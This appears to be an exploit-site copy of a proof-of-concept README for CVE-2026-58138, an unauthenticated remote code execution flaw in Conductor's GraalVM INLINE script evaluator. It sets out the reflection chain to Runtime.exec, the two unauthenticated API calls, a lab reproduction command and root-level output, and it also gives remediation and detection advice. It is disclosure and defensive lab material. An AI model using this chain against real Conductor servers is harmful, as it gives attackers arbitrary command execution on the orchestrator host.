Exploit for CVE-2026-58138

Name: Exploit for CVE-2026-58138
Rating: 5 (6 reviews)
2026-06-30 | CVSS 9.8
## https://sploitus.com/exploit?id=21D020CF-21B0-55A8-BA7E-316F76903171
# CVE-2026-58138 — Conductor Unauthenticated RCE via INLINE GraalVM Evaluator

> **Conductor (OSS / Orkes) `3.21.21` … before `3.30.2`** evaluates user-supplied
> JavaScript in `INLINE` (and `LAMBDA` / `DO_WHILE` / `SWITCH`) tasks with a GraalVM
> context built with **full host access** (`HostAccess.ALL`). The script reflects up
> to `java.lang.Runtime` and runs OS commands. The community API has **no
> authentication by default**, so submitting a workflow with such a task is
> unauthenticated remote code execution.

| | |
|---|---|
| **CVE** | CVE-2026-58138 |
| **Advisory** | [vulncheck — Orkes Conductor unauth RCE via GraalVM script evaluators](https://www.vulncheck.com/advisories/orkes-conductor-unauthenticated-rce-via-graalvm-script-evaluators) |
| **Affected** | Conductor `3.21.21` … before `3.30.2` |
| **Fixed** | `3.30.2` (commits `87a7d96`, `c691e35`) |
| **Class** | CWE-94 (Code Injection) — GraalVM polyglot sandbox not enforced |
| **CVSS** | `9.8` — `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` |
| **Auth** | **None** (community API is unauthenticated by default) |
| **Status** | **CONFIRMED** — reproduced as **root** against `conductoross/conductor:3.22.3` |

> **Version note (read this).** The evaluator config varies inside the affected range:
> versions through ~`3.29.x` (this lab uses **`3.22.3`**) build the context with plain
> `allowHostAccess(HostAccess.ALL)` — the unsandboxed config the CVE describes, and the
> one this PoC exploits directly. The `3.30.0`/`3.30.1` line added a *partial*
> `denyAccess(...)` blocklist (reflection blocked); the complete fix
> (`allowHostClassLoading(false)` + engine hardening) only lands in **`3.30.2`**. This
> PoC targets the plain-`HostAccess.ALL` configuration; it does **not** claim to bypass
> the `3.30.1` blocklist.

---

## Root cause

`core/.../events/ScriptEvaluator.java` (≤ 3.29.x / 3.22.3):

```java
return Context.newBuilder("js")
        .allowHostAccess(HostAccess.ALL)   // full host interop -> no sandbox
        .build();
```

`HostAccess.ALL` lets the script call any method/field on Java host objects. The
`INLINE` task binds its input as `$`, a real Java object, so the script can pivot:
`$.getClass().getClass()` → `java.lang.Class` → `Class.forName("java.lang.Runtime")`
→ `Runtime.getRuntime().exec(...)`. The Python evaluator is equivalent
(`Context.newBuilder("python").allowAllAccess(true)`).

## Exploitation

1. Register a workflow whose `INLINE` task carries the malicious `expression`
   (`POST /api/metadata/workflow`, no auth).
2. Start it (`POST /api/workflow/{name}`, no auth).
3. The INLINE task evaluates the JS; the reflective `Runtime.exec` runs the command
   and the PoC returns its **stdout** as the task result.

## Reproduce

```bash
docker compose -f lab/docker-compose.yml up -d        # conductoross/conductor:3.22.3 (in range)
# wait ~60s for the all-in-one server to boot

python3 exploit.py http://127.0.0.1:8080 -c "id; hostname"
```

Observed:

```
[*] registering workflow with a malicious INLINE (javascript) task ... (no auth)
[*] started workflow id=...; reading INLINE task output ...
[+] UNAUTHENTICATED RCE CONFIRMED - command output from the Conductor host:
uid=0(root) gid=0(root) groups=0(root)
vbox
Linux 6.18.12+kali-amd64
```

`uid=0(root)` is the Conductor process user; the output is live `id`/`uname` state —
genuine execution, not echo. `exploit.py` uses only the Python standard library.

## Impact

Anyone able to reach the Conductor API executes arbitrary OS commands (here as
**root**) on the orchestrator host — full compromise of the workflow engine, its
persistence/queues, and every system its workflows and stored credentials touch.

## Remediation

* Upgrade to **Conductor ≥ 3.30.2** (the JS/Python evaluators no longer run with host
  access / class loading enabled).
* Defense in depth: put authentication in front of the Conductor API, run the server
  as a non-root, least-privilege user, and restrict who can register/run workflows.

## Detection

Flag workflow definitions whose `INLINE`/`LAMBDA`/`DO_WHILE`/`SWITCH` tasks contain
`expression` strings referencing `getClass`, `forName`, `Runtime`, `exec`,
`ProcessBuilder`, or `java.` reflection, and Conductor processes spawning shells.

See [`ANALYSIS.md`](ANALYSIS.md) for the reflection chain, the evaluator config across
versions, and the patch.

---

* Author: **Caio Fabrício** — [github.com/BiiTts](https://github.com/BiiTts)
* Vulnerability credit belongs to the original reporter / vendor advisory; this repo
  is an independent, reproducible lab + PoC for defensive and educational use. For
  authorized security testing only.